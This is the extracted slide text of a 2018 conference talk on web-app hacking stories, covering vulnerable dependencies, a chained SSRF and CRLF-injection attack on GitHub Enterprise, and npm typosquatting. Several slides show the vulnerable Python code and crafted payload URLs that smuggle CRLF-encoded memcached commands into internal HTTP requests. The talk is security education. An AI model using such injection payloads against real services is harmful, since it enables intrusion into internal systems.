Tweet
Tweet

Slide 1

Slide 1 text

How to hack an Angular app? @jawache ngConf 2018

Slide 2

Slide 2 text

How to hack a web app? @jawache ngConf 2018

Slide 3

Slide 3 text

Real Life Hacking Stories @jawache ngConf 2018

Slide 4

Slide 4 text

Asim Hussain @jawache codecraft.tv microsoft.com

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

Vulnerability vs. Exploit

Slide 7

Slide 7 text

@jawache #1

Slide 8

Slide 8 text

@jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

Slide 9

Slide 9 text

@jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

@jawache

Slide 12

Slide 12 text

@jawache

Slide 13

Slide 13 text

@jawache

Slide 14

Slide 14 text

@jawache

Slide 15

Slide 15 text

"12 of top 50 data breaches were through known vulnerabilities" - snyk.io https://snyk.io/blog/owasp-top-10-breaches/ @jawache

Slide 16

Slide 16 text

"77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

@jawache

Slide 19

Slide 19 text

@jawache nsp

Slide 20

Slide 20 text

@jawache Photo by energepic.com from Pexels Summary

Slide 21

Slide 21 text

#2 @orange_8361

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

git push @jawache http://example.com

Slide 24

Slide 24 text

@jawache git push http://0

Slide 25

Slide 25 text

@jawache git push http://0:8000/composer/send_email

Slide 26

Slide 26 text

def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

Slide 27

Slide 27 text

http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

Slide 28

Slide 28 text

def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

Slide 29

Slide 29 text

\r\n @jawache

Slide 30

Slide 30 text

%0D%0A @jawache

Slide 31

Slide 31 text

http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

Slide 32

Slide 32 text

GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

Slide 33

Slide 33 text

GET /%0D%0Ahello%0D%0AFoo:\r\n HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n \r\n \r\n @jawache

Slide 34

Slide 34 text

@jawache GET /\r\n hello\r\n Foo: HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n \r\n \r\n

Slide 35

Slide 35 text

...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

Slide 36

Slide 36 text

GET / set key 0 900 4 data HTTP/1.1 Host: 127.0.0.1:11211 Accept-Encoding: identity @jawache

Slide 37

Slide 37 text

code code @jawache

Slide 38

Slide 38 text

code code @jawache

Slide 39

Slide 39 text

@jawache Photo by Kelly Sikkema on Unsplash Summary

Slide 40

Slide 40 text

#3 @jawache

Slide 41

Slide 41 text

@jawache

Slide 42

Slide 42 text

@jawache

Slide 43

Slide 43 text

No content

Slide 44

Slide 44 text

@jawache

Slide 45

Slide 45 text

cross-env vs. crossenv @jawache

Slide 46

Slide 46 text

@jawache Photo by Jairo Alzate on Unsplash Summary

Slide 47

Slide 47 text

@scope/package-name @jawache

Slide 48

Slide 48 text

package-name packagename package.name @jawache

Slide 49

Slide 49 text

Update Small vulnerability Don't trust anyone All the things Fix @jawache

Slide 50

Slide 50 text

Asim Hussain @jawache codecraft.tv microsoft.com

Slide 51

Slide 51 text

#1 How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html CRLF injection vulnerability in the HTTPConnection https://www.cvedetails.com/cve/CVE-2016-5699/

Slide 52

Slide 52 text

#2 Exploit DB https://www.exploit-db.com/ Metasploit https://www.metasploit.com/ Azure App Services https://aka.ms/azure-app-service-docs Google App Engine https://cloud.google.com/appengine/ Heroku https://heroku.com Amazon Beanstack http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html The Equifax hack and how to protect your family — all explained in 5 minutes https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0

Slide 53

Slide 53 text

#3 Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836 Malicious packages in npm. Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/